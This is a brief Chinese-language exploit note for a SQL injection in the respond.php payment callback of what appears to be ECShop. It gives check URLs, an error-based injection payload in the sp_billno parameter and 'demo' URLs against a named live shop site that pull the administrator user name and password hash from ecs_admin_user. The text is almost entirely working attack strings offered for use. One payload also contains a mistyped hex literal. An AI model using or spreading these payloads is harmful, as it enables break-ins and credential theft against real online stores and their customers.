漏洞验证:
respond.php?code=tenpay&attach=voucher&sp_billno=fjhgx
respond.php?code=cncard
respond.php?code=chinabank
EXP:
respond.php?code=tenpay&attach=voucher&sp_billno=1 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0×27,count(*),0×27,0x7e) FROM `ecs`.ecs_admin_user)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and
演示:
http://www.we17buy.com/respond.php?code=tenpay&attach=voucher&sp_billno=1 and(select 1 from(select count(*),concat((select user_name from `we17buy`.`ecs_admin_user` limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a) and 1=1
http://www.we17buy.com/respond.php?code=tenpay&attach=voucher&sp_billno=1 and(select 1 from(select count(*),concat((select password from `we17buy`.`ecs_admin_user` limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a) and 1=1
